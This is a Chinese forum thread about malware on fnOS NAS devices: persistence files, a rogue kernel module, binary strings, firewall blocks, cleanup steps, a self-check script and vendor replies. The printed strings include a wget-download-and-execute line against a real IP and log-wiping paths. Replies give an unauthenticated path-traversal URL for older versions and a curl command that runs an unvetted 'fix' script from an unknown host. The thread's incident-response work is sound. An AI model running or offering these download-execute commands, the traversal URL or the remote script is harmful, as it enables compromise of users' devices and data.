fnos 恶意程序分析

DCr9nmaqFU14O

可疑文件

所有文件增加了不可修改属性，root**无法直接删除，需要先使用
chattr -i /path/to/file 再进行删除。

root@fnos:~# lsattr -Ra /usr > attr
root@fnos:~# grep '\-i-' attr 
----i---------e------- /usr/bin/nginx
----i---------e------- /usr/trim/bin/trim_https_cgi
----i---------e------- /usr/sbin/gots
root@fnos:~# lsattr -Ra /etc > attr2 2> /dev/null 
root@fnos:~# grep '\-i-' attr2 
----i---------e------- /etc/systemd/system/trim_https_cgi.service
----i---------e------- /etc/systemd/system/nginx.service
----i---------e------- /etc/rc.local

其中/usr/bin/nginx、 /usr/sbin/gots md5值相同。

/etc/modules

cat /etc/modules
# /etc/modules: kernel modules to load at boot time.
#
# This file contains the names of kernel modules that should be loaded
# at boot time, one per line. Lines beginning with "#" are ignored.
# Parameters can be specified after the module name.

bonding
msr

snd_pcap  # 这个是恶意模块，飞牛原版镜像没有这个模块

root@fnos:/# modinfo snd_pcap
filename:       /lib/modules/6.12.18-trim/snd_pcap.ko
description:    Save logs
author:         FnOS
license:        GPL
depends:      
name:           snd_pcap
retpoline:      Y
vermagic:       6.12.18-trim SMP preempt mod_unload modversions 

个人感觉飞牛可能需要对内核模块进行签名，签名非法的模块禁止内核加载。由于飞牛对内核进行了自定义修改，使用其它内核可能导致某些功能不正常。

/etc/rc.local

cat /etc/rc.local 

# AutoStart
/sbin/gots x86 &

/etc/systemd/system/nginx.service

cat /etc/systemd/system/nginx.service 
[Unit]
Description=AutoStart Service
After=network-online.target
Requires=network-online.target

[Service]
Type=oneshot
ExecStart=/usr/bin/nginx x86
RemainAfterExit=yes
Restart=no

[Install]
WantedBy=multi-user.target

可疑进程

无法确定哪个程序监听57132端口，但发现trim_https_cgi文件中包含57132字符串，大概率来自这个程序。无法确定进程号，猜测可能和snd_pcap这个恶意的内核模块有关。

无法查看具体哪个程序在监听：

root@fnos:~# netstat -ntlp |grep 57132
tcp        0      0 0.0.0.0:57132           0.0.0.0:*               LISTEN      -                 
root@fnos:~# ss -ntlp |grep 57132
LISTEN 0      64                   0.0.0.0:57132      0.0.0.0:*   

无法查看打开了哪些文件：
root@fnos:~# lsof -i :57132
root@fnos:~# fuser -uv 57132/tcp  

strings /usr/trim/bin/trim_https_cgi |grep 57132
kill -9 $(lsof -t -i:57132)

可疑网络连接

通过分析发现恶意程序会访问45.95.212.102, 151.240.13.91两个地址，暂时通过防火墙拦截：

chain output {
type filter hook output priority filter; policy accept;
ip daddr 45.95.212.102 counter packets 0 bytes 0 drop
ip daddr 151.240.13.91 counter packets 22 bytes 1320 drop
}

/sbin/gots 文件分析

1. 会重命名cat命令，所以偶尔会发现cat命令丢失
2. 杀掉飞牛的network_service|resmon_service两个进程
3. 修改rc.local, 修改/etc/systemd/system/%s.service 某个服务
4. 访问45.95.212.102这个ip地址

strings /sbin/gots

GET / HTTP/1.1
Host: 1.1.1.1
Connection: keep-alive
expand 32-byte k/dev/null
/bin/sh
/proc/%d
/tmp
mv /usr/bin/cat /usr/bin/cat2
mv /usr/bin/cat2 /usr/bin/cat
pkill -f 'network_service|resmon_service'
%s-%s-%s-%s-%s
stat error
/proc/net/tcp
/proc/

/usr/bin/%s
/sbin/gots
cp %s %s > /dev/null 2>&1
[Service]
Type=oneshot
ExecStart=%s %s
RemainAfterExit=yes
Restart=no
/etc/rc.d/rc.local
%s %s
/etc/rc.local
# AutoStart
%s &
/etc/systemd/system/%s.service
[Unit]
Description=AutoStart Service
After=network-online.target
Requires=network-online.target
[Install]
WantedBy=multi-user.target
systemctl enable %s.service > /dev/null 2>&1
45.95.212.102
%s|%lu|%lu|%s|%s

下面这个文件 /usr/trim/bin/trim_https_cgi ，

1. 会清空系统日志信息， 删除audit审计日志
2. 访问151.240.13.91这个地址
3. 修改fnos/usr/trim/bin/system_startup.sh这个文件，增加下面这一行的内容：
   wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp

包含有两个飞牛的域名：
apiv2-liveupdate.fnnas.com
update-service.test.teiron-inc.cn 这个看起来像是恶意域名，但使用whois查询，发现以下内容：

Raw Whois Data

Domain Name: teiron-inc.cn
ROID: 20230301s10001s51450343-cn
Domain Status: ok
Registrant: 广州铁刃智造技术有限公司
Registrant Contact Email: ![email](https://www.whois.com/eimg/8/0a/80ae60a7dfb057baec99ad4e686e1e93be12c94b.png)@qq.com
Sponsoring Registrar: 阿里云计算有限公司（万网）
Name Server: dns15.hichina.com
Name Server: dns16.hichina.com
Registration Time: 2023-03-01 17:47:09
Expiration Time: 2026-03-01 17:47:09
DNSSEC: unsigned


Organization:
广州铁刃智造技术有限公司
Email: 411030589@qq.com

二进制文件中的常量字符串：
strings /usr/trim/bin/trim_https_cgi

dev/null
/bin/sh
/etc/hosts
%15s %4095s %15s
Not Found
/api
%2hhx
HTTP/1.1 %d %s
Content-Length: 2
Content-Type: text/plain
Connection: close
/usr/trim/bin/%s
cp %s %s > /dev/null 2>&1
[Service]
Type=oneshot
ExecStart=%s
RemainAfterExit=yes
Restart=no
/etc/systemd/system/%s.service
[Unit]
Description=AutoStart Service
After=network-online.target
Requires=network-online.target
[Install]
WantedBy=multi-user.target
systemctl enable %s.service > /dev/null 2>&1
0.0.0.0 %s
:: %s
/proc/%d
/tmp
/usr/trim/BULID
151.240.13.91
/tmp/trim_fnos
GET %s HTTP/1.1
Host: %s
Connection: close
%s/%s


%s/%s
findmnt
chattr
liveupdate
backup_local
backup_remote
backup_cloud
pkill -f backup_service
pkill -f sysrestore_service
system_startup.sh
wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
/var/log/accountsrv/
/var/log/apps/
/var/log/apt/
/var/log/cloud_storage_dav/
/var/log/openvswitch/
/var/log/postgresql/
/var/log/trim_app_center/
/var/log/trim_license/
/var/log/trim_sac/
/var/log/trim_tfa/
/var/log/trim-connect/
/var/log/trim-sharelink/
/var/log/*.log
/usr/trim/logs/ai_manager/
/usr/trim/logs/*.log
/usr/trim/nginx/logs/
/var/log/secure
/var/log/secure.1
/var/log/secure-*
/var/log/secure.*.gz
/var/log/messages
/var/log/messages.1
/var/log/messages-*
/var/log/messages.*.gz
/run/log/journal/
/var/log/journal/
/var/log/wtmp
/var/log/btmp
/var/log/lastlog
/var/log/audit/audit.log
/proc
/sys
/dev
/var/run
/var/lock
/lost+found
/tmp/trim-update
/tmp/appcenter
postgres
trim_https_cgi
/var/log/audit/audit.log.*   
apiv2-liveupdate.fnnas.com
kill -9 $(lsof -t -i:57132)
update-service.test.teiron-inc.cn
chmod 777 /tmp/trim_fnos ; /tmp/trim_fnos ; rm -rf /tmp/trim_fnos
HOME
-0X+0X 0X-0x+0x 0x
-+   0X0x
(null)
0123456789ABCDEF
M(knN
No error information
Illegal byte sequence
Domain error
Result not representable

综合分析，这个恶意程序应该是专门针对飞牛系统设计的。

修复方式

1. 修改防火墙，禁止访问恶意ip地址

	type filter hook output priority filter; policy accept;
	ip daddr 45.95.212.102 counter packets 0 bytes 0 drop
	ip daddr 151.240.13.91 counter packets 22 bytes 1320 drop
}

2. 清理内核模块：
   /lib/modules/6.12.18-trim/snd_pcap.ko
   执行 depmod -a
3. 还原/usr/trim/bin/system_startup.sh 文件，删除最后一行
4. 清理上面发现的恶意程序
5. 重启观察是否恶意文件是否重新生成，观察/usr/trim/bin/system_startup.sh 是否又被修改。

通过grafana查看prometheus监控，未发现有异常活动，使用nft list ruleset 查看防火墙规则列表，上面拉黑的两个ip地址，统计数字都为0， 基本确认已清理干净。

系统加固建议

1. 打开飞牛自带的防火墙和操作系统防火墙
2. 使用fail2ban自动封禁ssh登录失败的ip
3. ssh禁止密码登录，禁止root登录，只允许特定用户登录, 只允许私钥登录

langlangzhu

大佬厉害，我排查也是连接了151.240.13.91才导致连接数暴涨，最后靠飞牛远程给我解决的，目前再也没出现问题了

飞牛社区主理人

感谢分享，该问题官方已知，经过技术分析追踪该行为是在公网暴露服务的情况下，开启http明文方式访问，设备曾被来自海外的ip异常访问或利用，导致三方进程残留或被再次触发，进而产生大量连接的问题。最新系统已对该特征做过滤与防护。
但http的明文访问方式本身存在高风险，因此建议

遇到该情况，建议按以下步骤确认一下设备安全
1. 确认当前飞牛系统版本已升级至最新版本1.1.15
2. 确认在关闭公网端口映射情况下，异常上传行为是否停止
3. 确认设备公网访问场景下，是使用的 HTTPS与FNID或其他加密访问方式

针对遇到问题后重装，需要注意
1. 检查新系统中是否存在非飞牛默认服务的进程、容器或计划任务
2. 需重点关注异常文件是否位于数据盘中，系统重装后仍可能被再次触发

如果在以上操作后，依然遇到疑似风险访问行为，可与官方联系

我们也欢迎技术专家通过官方渠道向飞牛提交安全漏洞线索，经确认的首个有效线索，将获得相应的安全反馈激励。漏洞反馈入口：
https://trim-nas.feishu.cn/share/base/form/shrcnYhRB4ryb9K8Te9GEqeRYYe?from=from_parent_docs

HTTP在公网传输中存在固有的安全缺陷。最有效的防护措施，就是避免在公网直接使用HTTP。



============================================================
2月1日更新

感谢评论区指正，因过去对已有案例的分析中，异常案例共性为v4公网+HTTP方式，因此遇到类似反馈，优先提醒了注意不要使用HTTP方式，确实存在描述不严谨的地方。
实际V4公网只是导致设备更容易暴露与被入侵，并非入侵原因。
目前官方已完整逆向入侵过程，并对相关漏洞进行修复，并发布了安全更新。

请尽快升级到1.1.18系统，以解决该问题。同时，1.1.18系统内置了自动查杀能力，升级后可以清理系统内相关异常文件。
查杀为定时自动执行，无需手动操作

Illustar0

POC 满天飞了你们还装成什么都不知道的样子吗？什么都不知道1.1.15是怎么修复这个问题的？

飞牛社区主理人

nijpatin 发表于 2026-2-1 09:12
现在更新1.1.18修复前面问题了吗？木马被修复了吗？现在还不敢开机

1.1.18已修复已知漏洞，并添加了自动查杀木马

qianlongzt

网上随便找的幸运用户。0.9.29 https

https://mp.weixin.qq.com/s/oktCsLc68OY7tJMPJjlwsg
至少在2025年10月26日这个漏洞就存在了

0.9.9

akbiubiu

和http没关系飞牛前几个版本有越权路径的0day 映射到公网的nas在域名后面加/app-center-static/serviceicon/myapp/%7B0%7D?size=../../../../可以直接访问你nas里的文件

nijpatin

飞牛官方应该出个公告了，不然到时候泄露过多，暴雷了，影响太大了，都跑去群晖了

Eic

同样的问题，之前一直是0.92版本没升级，前几天发现家里网络经常丢包，还以为是线路故障或者路由有问题，昨天在路由上检查到飞牛的IP动不动就10万连接数才发现出问题了，排查了好久才解决，平时只开了5666 5777的外网访问，其他端口都没开放，账户也是大小写字母+数字，不知道怎么挨的

Eic

这玩意儿明显是官方有0day漏洞了，我就只开了web的访问端口，其他端口全都没开放，现在还没个说法，我现在还担心我相册泄漏，看了下nas最近有60多g的上传，虽然都是日常照片，但是如果被泄露了还是不爽

nijpatin

晕，搞得我现在不用的时候不敢开机了，用的时候才开机

master-matt

推测就是1月22号的更新后有漏洞，ssh就没在公网开过，我的密码也挺复杂的，另外都是https访问，也是这个同样的情况被黑，我是resolvconf 脚本强依赖cat，导致执行失败后dns异常，app更新失败，排查发现是cat工具没了。。。感觉很不对劲，来论坛一看，果然不止我一个人中招！之所以推测是1月22系统更新后的漏洞，是因为当时就出现了app更新时失败，原因是权限异常，官方说不知道问题是啥，还在排查，临时给了个修改权限的方案，后来也没再给原因，帖子在这：应用中心应用下载失败处理办法，其实当时就已经是被黑了，这么多天当没事人一样啊！

johnnylu

看了一下没有这个模块，是否表示安全？

惊天小黑

[quote][size=2][url=forum.php?mod=redirect&goto=findpost&pid=243855&ptid=53230][color=#999999]Eic 发表于 2026-1-30 22:44[/color][/url][/size] 同样的问题，之前一直是0.92版本没升级，前几天发现家里网络经常丢包，还以为是线路故障或者路由有问题，昨 ...[/quote]

这样设置可以不

DCr9nmaqFU14O

master-matt 发表于 2026-1-31 02:55
推测就是1月22号的更新后有漏洞，ssh就没在公网开过，我的密码也挺复杂的，另外都是https访问，也是这个同 ...

确实是22号开始的，stat /usr/trim/bin/system_startup.sh 的输出，显示修改时间就是22号。感觉飞牛的登录要和主机的登录分开来， 现在二者是一起的，飞牛中修改用户密码，ssh登录也会同时更改。

cooldcc

还真是0DAY漏洞啊

lurenjia

有木有文件样本？

balalll

Eic 发表于 2026-1-31 01:24
这玩意儿明显是官方有0day漏洞了，我就只开了web的访问端口，其他端口全都没开放，现在还没个说法，我现在 ...

跟你web访问端口没啥关系吧，主要是http访问方式

balalll

master-matt 发表于 2026-1-31 02:55
推测就是1月22号的更新后有漏洞，ssh就没在公网开过，我的密码也挺复杂的，另外都是https访问，也是这个同 ...

看了一下社区被攻击的帖，跟更新没啥关系，官方好像说是http明文方式+公网本身就是高风险的，你http端口开了么

不自由寻迹

有什么问题跟我雷池说去吧

oldwa

普通用户不开公网，会不会有危险？

白起

惊天小黑 发表于 2026-1-31 07:42
这样设置可以不

我就是进限制大陆IP访问，但这样还是不保险

月光微暖冬亦凉

套雷池吧 我很早就做了这个帖子 我套了雷池哪怕就开默认的防护级别也拦截了 这个IP估计已经上雷池黑名单了

LeonardGee

自查了一下发现也中招了，我说这段时间家里网络这么不稳定呢

koto

没有公网 IP 何尝不是一种防御（

自查脚本

OUT="/tmp/fnos_ioc_$(date +%F_%H%M%S).txt"
{
  echo "== [1] immutable(不可修改) 属性扫描 =="
  lsattr -Ra /usr 2>/dev/null | grep '\-i-' || true
  lsattr -Ra /etc 2>/dev/null | grep '\-i-' || true

  echo
  echo "== [2] 可疑文件是否存在 + 基本信息 =="
  for f in \
    /usr/bin/nginx \
    /usr/sbin/gots \
    /usr/trim/bin/trim_https_cgi \
    /etc/systemd/system/nginx.service \
    /etc/systemd/system/trim_https_cgi.service \
    /etc/rc.local
  do
    if [ -e "$f" ]; then
      echo "-- $f"
      ls -l "$f" 2>/dev/null || true
      sha256sum "$f" 2>/dev/null || true
      file "$f" 2>/dev/null || true
      echo
    fi
  done

  echo "== [3] /etc/modules 与 snd_pcap 模块 =="
  grep -n 'snd_pcap' /etc/modules 2>/dev/null || true
  lsmod 2>/dev/null | grep -E '^snd_pcap\b' || true
  modinfo snd_pcap 2>/dev/null || true
  find /lib/modules -name 'snd_pcap.ko' -maxdepth 4 2>/dev/null || true

  echo
  echo "== [4] 启动项/服务 =="
  grep -n 'gots' /etc/rc.local 2>/dev/null || true
  systemctl status nginx.service trim_https_cgi.service 2>/dev/null || true
  systemctl cat nginx.service trim_https_cgi.service 2>/dev/null || true

  echo
  echo "== [5] 57132 端口监听情况 =="
  ss -lntp 2>/dev/null | grep ':57132' || true
  netstat -ntlp 2>/dev/null | grep ':57132' || true

  echo
  echo "== [6] 关键 IOC 字符串（如有 strings） =="
  if command -v strings >/dev/null 2>&1; then
    strings /usr/trim/bin/trim_https_cgi 2>/dev/null | egrep '57132|45\.95\.212\.102|151\.240\.13\.91|turmp' | head -n 80 || true
  fi
  grep -n '151\.240\.13\.91\|turmp' /usr/trim/bin/system_startup.sh 2>/dev/null || true

  echo
  echo "== DONE. 输出文件：$OUT =="
} >"$OUT" 2>&1

echo "已生成：$OUT"

Fly.

/usr/trim/bin/system_startup.sh 文件只读，chattr提示命令不存在，怎么解决

yuyuko

akbiubiu 发表于 2026-1-31 11:44
和http没关系飞牛前几个版本有越权路径的0day 映射到公网的nas在域名后面加/app-center-static/serviceicon ...

现在也可以

DCr9nmaqFU14O

Fly. 发表于 2026-1-31 13:29
/usr/trim/bin/system_startup.sh 文件只读，chattr提示命令不存在，怎么解决

root@fnos:~# dpkg -S chattr
e2fsprogs: /usr/bin/chattr
e2fsprogs: /usr/share/man/man1/chattr.1.gz
root@fnos:~# apt install e2fsprogs^C
root@fnos:~# chattr -i /usr/trim/bin/system_startup.sh

sheqibin

被攻击的都是v4公网么？  我只有v6公网 有没有事

Fly.

还是不行，显示已安装

DCr9nmaqFU14O

Fly. 发表于 2026-1-31 14:02
还是不行，显示已安装

apt-get reinstall e2fsprogs  

应该是这个程序已经安装过了，被恶意程序把chattr命令删除了

master-matt

balalll 发表于 2026-1-31 10:31
看了一下社区被攻击的帖，跟更新没啥关系，官方好像说是http明文方式+公网本身就是高风险的，你http端口 ...

我没有公网ip，http只在内网用，外网是通过frp穿透的，只暴露https端口，22号我跟很多人一样app更新失败，就是因为权限被修改了，那时已经被黑了，官方才说出一个上面的教程，但没说原因

飞牛社区主理人

oldwa 发表于 2026-1-31 11:14
普通用户不开公网，会不会有危险？

不纯是公网原因，明文访问方式才是高风险的关键，有公网的情况下，强制HTTPS能避免当前情况

Fly.

DCr9nmaqFU14O 发表于 2026-1-31 14:04
apt-get reinstall e2fsprogs  

应该是这个程序已经安装过了，被恶意程序把chattr命令删除了 ...

可以了 感谢

甜菜x

飞牛社区主理人 发表于 2026-1-31 14:06
不纯是公网原因，明文访问方式才是高风险的关键，有公网的情况下，强制HTTPS能避免当前情况 ...

支持自动签证ssl后，我也开了强制https呀，昨晚还是发现高连接数的问题

master-matt

1.1.15版本前存在严重的路径穿越bug，不信的话符合版本的用户在不登录情况下访问 /app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../ 这个url，你会吓一跳，你的所有文件别人可以访问

zzkkoo8

不自由寻迹 发表于 2026-1-31 10:33
有什么问题跟我雷池说去吧

哥们买了？

zzkkoo8

不自由寻迹 发表于 2026-1-31 10:33
有什么问题跟我雷池说去吧

通过飞牛官方connect访问如何把   飞牛挂载在雷池前面？

飞牛社区主理人

master-matt 发表于 2026-1-31 14:06
我没有公网ip，http只在内网用，外网是通过frp穿透的，只暴露https端口，22号我跟很多人一样app更新失败 ...

私信一下联系方式，加你看一下

success

#一键检测修复工具

curl -ksSL https://us1.vvvvvv.de5.net/sh/fnos_xxck1.sh -o /usr/local/bin/fnos_xxck1 && chmod +x /usr/local/bin/fnos_xxck1 && fnos_xxck1

master-matt

飞牛社区主理人 发表于 2026-1-31 14:37
私信一下联系方式，加你看一下

已经重装系统了

82280095

我中招了，应该怎么修复？难道只能重装才能解决吗？

success

82280095 发表于 2026-1-31 15:08
我中招了，应该怎么修复？难道只能重装才能解决吗？

评论区往上看，一键检测 修复工具

斯诺克王子

[quote][size=2][url=forum.php?mod=redirect&goto=findpost&pid=244193&ptid=53230][color=#999999]success 发表于 2026-1-31 14:39[/color][/url][/size] #一键检测修复工具 curl -ksSL https://us1.vvvvvv.de5.net/sh/fnos_xxck1.sh -o /usr/local/bin/fnos_xxc ...[/quote]

执行报错了

斯诺克王子

success 发表于 2026-1-31 15:23
评论区往上看，一键检测 修复工具

执行报错了

akbiubiu

yuyuko 发表于 2026-1-31 13:31
现在也可以

我没升级最新版本，最新版本也可以吗，如果可以建议关闭5666和5667端口

哈瑞洛夫斯基

master-matt 发表于 2026-1-31 14:27
1.1.15版本前存在严重的路径穿越bug，不信的话符合版本的用户在不登录情况下访问 /app-center-static/servi ...

https://域名/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../
这样么？

皮的很

success 发表于 2026-1-31 14:39
#一键检测修复工具
curl -ksSL https://us1.vvvvvv.de5.net/sh/fnos_xxck1.sh -o /usr/local/bin/fnos_xxc ...

>>> 阶段 6: 净化系统配置
sed: cannot rename /etc/sedpT4dRD: Operation not permitted
[正常]   已清理 /etc/rc.local
sed: cannot rename /usr/trim/bin/sedn8zZ0N: Operation not permitted
[正常]   已清理 /usr/trim/bin/system_startup.sh
[信息] Systemd 守护进程配置已重载

这两个文件就是不行 脚本跑了几遍都不行

mundane

master-matt 发表于 2026-1-31 02:55
推测就是1月22号的更新后有漏洞，ssh就没在公网开过，我的密码也挺复杂的，另外都是https访问，也是这个同 ...

我也是 当时cat命令失效  dns失效

82280095

奇怪了，飞牛感觉没有网络了，能访问，但是什么都打不开了，商店，更新服务，全部失败了。

ZERO_XSWqv

皮的很 发表于 2026-1-31 15:38
>>> 阶段 6: 净化系统配置
sed: cannot rename /etc/sedpT4dRD: Operation not permitted
[正常]   已清 ...

我也是，这一步报错

master-matt

82280095 发表于 2026-1-31 15:51
奇怪了，飞牛感觉没有网络了，能访问，但是什么都打不开了，商店，更新服务，全部失败了。
...

我也是当时应用商店下载不了东西，查看问题是dns失败，ssh上机器 手动 resolvconf -u 更新dns 配置异常，发现是cat命令缺失，就是博主分析的这个病毒把cat改名为cat2了，你看看你是不是也是cat没了，是的话就是也中招了。